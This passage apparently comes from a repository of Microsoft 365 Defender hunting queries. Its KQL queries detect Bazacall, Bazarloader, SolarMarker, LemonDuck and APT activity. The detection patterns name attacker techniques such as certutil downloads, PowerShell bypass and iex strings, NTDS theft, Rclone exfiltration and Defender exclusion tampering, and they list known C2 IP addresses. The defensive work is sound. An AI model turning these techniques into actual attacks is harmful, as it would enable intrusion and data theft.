| join AlertEvidence on $left.AlertId == $right.AlertId
| where FileName matches regex @"^([a-z0-9]){7}\.exe$" and FileName matches regex "[0-9]{1,5}"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | v | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/Dropping payload via certutil.md
================================================
# BazaCall dropping payload via certutil.exe
BazaCall is a campaign that manipulate users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Excel file, they are prompted to enable a malicious macro that infects their device with BazaLoader.
This query hunts for an attacker-created copy of *certutil.exe*, a legitimate process, which the macro uses to download BazaLoader.
## Query
```kusto
DeviceFileEvents
| where InitiatingProcessFileName !~ "certutil.exe"
| where InitiatingProcessFileName !~ "cmd.exe"
| where InitiatingProcessCommandLine has_all("-urlcache", "split", "http")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/Excel Macro Execution.md
================================================
# Bazacall Excel Macro Execution
Bazacall uses malicious macro-enabled Excel documents to execute their payload.
## Query
This query looks for the malicious macro being executed on a machine.
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ "excel.exe"
and ProcessCommandLine has_all('mkdir', '&& copy', 'certutil.exe')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/Excel file download domain pattern.md
================================================
# BazaCall Excel file download domain pattern
BazaCall is a campaign that manipulate users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Excel file, they are prompted to enable a malicious macro that infects their device with BazaLoader.
This query surfaces connections to the distinctive *.xyz* domains that the BazaCall campaign uses to host malicious Excel files.
## Query
```kusto
DeviceNetworkEvents
| where RemoteUrl matches regex @".{14}\.xyz/config\.php"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/Malicious Excel Delivery.md
================================================
# Bazacall Malicious Excel Delivery
Bazacall uses malicious Excel files to execute payloads on affected devices.
## Query
This query looks for files that are downloaded from URL paths known to be associated with the Bazacall threat.
```
DeviceFileEvents
| where FileOriginUrl has "/cancel.php" and FileOriginReferrerUrl has "/account"
or FileOriginUrl has "/download.php" and FileOriginReferrerUrl has "/case"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/NTDS theft.md
================================================
# Bazacall NTDS.dit Theft
Microsoft has observed compromises related to Bazacall resulting in theft of the Active Directory database using ntdsutil.exe.
## Query
This query looks for copies of NTDS created in specific file paths known to be associated with the Bazacall threat.
```
DeviceProcessEvents
| where FileName =~ "ntdsutil.exe"
| where ProcessCommandLine has_any("full", "fu")
| where ProcessCommandLine has_any ("temp", "perflogs", "programdata")
// Exclusion
| where ProcessCommandLine !contains @"Backup"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | v | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/Renamed Rclone Exfil.md
================================================
# Bazacall Renamed Rclone for Exfiltration
Microsoft has observed Bazacall using a renamed version of Rclone for data exfiltration.
## Query
This query looks for Rclone being renamed to be used for data exfiltration.
```
DeviceProcessEvents
| where ProcessVersionInfoProductName has "rclone" and not(FileName has "rclone")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | v | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/RunDLL Suspicious Network Connection.md
================================================
# RunDLL Suspicious Network Connections
During the chain of events from Bazacall to Bazaloader, RunDLL makes several network connections, including to command and control (C2) infrastructure. The command line for these connections contains a specific process paramter, ",GlobalOut" that can surface potentially malicious activity related to Bazacall and Bazaloader.
## Query
This query looks for network connection events made by the RunDll32.exe process that have a command line that contains the ",GlobalOut" process parameter.
```
DeviceNetworkEvents
| where InitiatingProcessFileName =~ 'rundll32.exe' and InitiatingProcessCommandLine has ",GlobalOut"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazarloader/Stolen Images Execution.md
================================================
# Stolen Images
The "Stolen Images" Bazarloader campaign uses fake copyright infingement contact form emails and malicious files pretending to contain "stolen images" to trick users into downloading the malware.
## Query
This query looks for instances of Wscript being used to execute the malicious "stolen images" file associated with this Bazarloader campaign.
```
DeviceProcessEvents
| where FileName =~ "wscript.exe" and ProcessCommandLine has_all("stolen", "images")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazarloader/Zip-Doc - Creation of JPG Payload File.md
================================================
# Zip-Doc - Creation of JPG Payload File
In the campaign where Bazarloader is delivered via emails containing pw protected zip attachments, regsvr32.exe is used to launch a malicious payload that is disguised as a JPG file.
## Query
This query looks for instances of regsvr32.exe launching a file with a .jpg extension and summarizes the file name, SHA256, and Device ID for easy analysis.
```
DeviceImageLoadEvents
| where InitiatingProcessFileName =~ "regsvr32.exe" and InitiatingProcessCommandLine has ".jpg" and FileName endswith ".jpg"
| summarize by FileName, SHA256, DeviceId, bin(Timestamp, 1d)
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazarloader/Zip-Doc - Word Launching MSHTA.md
================================================
# Zip-Doc - Word Launching MSHTA
The pw protected zip attachment -> Word doc delivery method of Bazarloader utilizes Word to create an .hta file and launch it via MSHTA to connect to a malicious domain and pull down the Bazarloader paylaod.
## Query
This query looks for instnaces of Microsoft Word creating an .hta file
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ 'WINWORD.EXE' and FileName =~ 'cmd.exe' and ProcessCommandLine has_all('hta')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bear Activity GTR 2019.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_bear_activity_gtr19.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (FileName =~ "xcopy.exe" and ProcessCommandLine has @" /S /E /C /Q /H \")
or (FileName =~ "adexplorer.exe" and ProcessCommandLine has @" -snapshot """" c:\users\")
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Cloud Hopper.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_cloudhopper.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ @"cscript.exe" and ProcessCommandLine has ".vbs /shell "
| top 100 by Timestamp desc
================================================
FILE: Campaigns/DofoilNameCoinServerTraffic.txt
================================================
// This is a query to retrieve last 30 days network connections to known Dofoil NameCoin servers
// The full article is available here: https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/
DeviceNetworkEvents
| where RemoteIP in (
"139.59.208.246","130.255.73.90","31.3.135.232","52.174.55.168","185.121.177.177","185.121.177.53",
"62.113.203.55","144.76.133.38","169.239.202.202","5.135.183.146","142.0.68.13","103.253.12.18",
"62.112.8.85","69.164.196.21","107.150.40.234","162.211.64.20","217.12.210.54","89.18.27.34",
"193.183.98.154","51.255.167.0","91.121.155.13","87.98.175.85","185.97.7.7")
| project DeviceName, InitiatingProcessCreationTime, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteIP, RemotePort
================================================
FILE: Campaigns/Dopplepaymer In-Memory Malware Implant.txt
================================================
///////////////////////////////////////////////////////////////////
// Dopplepaymer In-Memory Malware Implant
//
// This query identifies processes with command line launch strings
// which match the pattern used in Dopplepaymer ransomware attacks.
///////////////////////////////////////////////////////////////////
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine startswith "-q -s {{" and ProcessCommandLine contains "}} -p "
================================================
FILE: Campaigns/Dragon Fly.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_dragonfly.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "crackmapexec.exe"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Elise backdoor.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_elise.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (FolderPath =~ @"C:\Windows\SysWOW64\cmd.exe" and ProcessCommandLine has @"\Windows\Caches\NavShExt.dll")
or (ProcessCommandLine endswith @"\AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll,Setting")
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Equation Group C2 Communication.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_equationgroup_c2.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (FolderPath endswith @"\rundll32.exe" and ProcessCommandLine endswith ",dll_u")
or ProcessCommandLine has " -export dll_u "
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Hurricane Panda activity.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_hurricane_panda.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine endswith " localgroup administrators admin /add"
or ProcessCommandLine has @"\Win64.exe"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Judgement Panda exfil activity.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_judgement_panda_gtr19.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has @"\ldifde.exe -f -n "
or ProcessCommandLine has @"\7za.exe a 1.7z "
or ProcessCommandLine endswith @" eprod.ldf"
or ProcessCommandLine has @"\aaaa\procdump64.exe"
or ProcessCommandLine has @"\aaaa\netsess.exe"
or ProcessCommandLine has @"\aaaa\7za.exe"
or ProcessCommandLine has @"copy .\1.7z \"
or ProcessCommandLine has @"copy \client\c$\aaaa\"
or FolderPath == @"C:\Users\Public\7za.exe"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Jupyter-Solarmaker/deimos-component-execution.md
================================================
# Jupyter AKA SolarMarker
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization manipulation and malicious advertising in order to successfully encourage users to download malicious templates and documents. This malware has been popular since 2020 and currently is still active as of 2021.
# Deimos malware component execution
The following query checks specifically for the AMSI Script Content, signaling that the Deimos malware is loading for execution. This is most often seen loaded by Jupyter, but may be in accompaniment of other malware or Jupyter variants as well.
## Query
```
DeviceEvents
| where InitiatingProcessFileName =~ "powershell.exe"
| where ActionType == "AmsiScriptContent"
| where AdditionalFields endswith '[mArS.deiMos]::inteRaCt()"}'
| project InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, ActionType, AdditionalFields
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | v | |
| Command and control | | |
| Exfiltration | v | |
| Impact | v | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Jupyter-Solarmaker/evasive-powershell-executions.md
================================================
# Jupyter AKA SolarMarker
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization manipulation and malicious advertising in order to successfully encourage users to download malicious templates and documents. This malware has been popular since 2020 and currently is still active as of 2021.
# Jupyter's evasive PowerShell executions
The following query checks for instances of Jupyter or SolarMarker malware that launch a lengthy PowerShell script, which in turn reads from encoded strings to parse the next malicious script. The initiating process name for this will almost always end in ".tmp" and reflect the original downloaded executable name.
## Query
```
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_all
("-command","FromBase64String","));remove-item $",".length;$j++){$","$i++;if($i -ge $","-bxor","UTF8.GetString")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Jupyter-Solarmaker/evasive-powershell-strings.md
================================================
# Evasive PowerShell with uncommon read strings
This query searches for a string pattern detected in evasive PowerShell usage. Jupyter or SolarMarker will iterate on this pattern multiple times to read data and call additional processes. This query is not fully specific to Jupyter or SolarMarker, and will also return other malicious malware, but is unlikely to return false positives.
## Query
```
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has_all("-ep bypass","-command","get-content","remove-item","iex")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Jupyter-Solarmaker/successive-tk-domain-calls.md
================================================
# Jupyter AKA SolarMarker
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization manipulation and malicious advertising in order to successfully encourage users to download malicious templates and documents. This malware has been popular since 2020 and currently is still active as of 2021.
# Jupyter's SEO Delivery via .TK domains
The following query checks for more than 5 instances of a .tk domain being contacted within a 10 minutes interval. This malware frequently will use anywhere from 5-10 .TK domains as well as other uncommon TLDs such as .blog, .site, .ml, and .gq., which will appear randomly generated and appear after a query to a hosting provider or advertising site from a search engine. Activity would be succeeded by the download of the malicious file.
## Query
```
DeviceNetworkEvents
| where RemoteUrl endswith ".tk"
| summarize make_set(RemoteUrl) by DeviceId,bin(Timestamp, 10m)
| extend domainCount = array_length(set_RemoteUrl)
| where domainCount >= 5
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-competition-killer.md
================================================
# LemonDuck competition killer script execution
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding.
```
DeviceProcessEvents
| where ProcessCommandLine has_all("schtasks.exe","/Delete","/TN","/F")
| summarize make_set(ProcessCommandLine) by DeviceId
| extend DeleteVolume = array_length(set_ProcessCommandLine)
| where set_ProcessCommandLine has_any("Mysa","Sorry","Oracle Java Update","ok")
| where DeleteVolume >= 40 and DeleteVolume <= 80
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-component-download-structure.md
================================================
# LemonDuck component download structure
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for any instance of the current version of the LemonDuck component collection commands, even if the component names changes. This structure has and may continue to change over time in order to obfuscate detection. This will surface behavior that will collect mining, secondary malware and lateral movement executables from external sites. This query will typically return downloads of files such as "if.bin" or "kr.bin" or additional mining components.
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ "cmd.exe"
| where InitiatingProcessCommandLine has_all("echo","tmp+",".bin","gmd5","downloaddata","down_url")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-component-names.md
================================================
# LemonDuck common external component names
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the “Killer” and “Infection” functions for the malware as well as the mining components and potential secondary functions. This query only encompasses the most common component names.
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ "cmd.exe"
| where InitiatingProcessCommandLine has_any("kr.bin","if.bin","m6.bin")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | v | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-control-structure.md
================================================
# LemonDuck command-and-control contact structure
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for the unique method of contacting the command-and-control (C2) infrastructure for LemonDuck in order to register updates from the bot client or exfiltrate data. This structure has changed over time and this most recent iteration is active as of this report and from June-July 2021.
```
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "powershell.exe"
| where InitiatingProcessCommandLine has_all("Exponent=","FromBase64String","$url+")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | v | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-defender-exclusions.md
================================================
# LemonDuck Microsoft Defender drive exclusion tampering
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment.
```
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("Set-MpPreference", "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess")
| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-email-subjects.md
================================================
# LemonDuck Email Subjects
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .doc, .zip or .js, though this could be subject to change as well as the subjects themselves.
```
EmailEvents
| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS',
'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?')
| where AttachmentCount >= 1
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | v | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
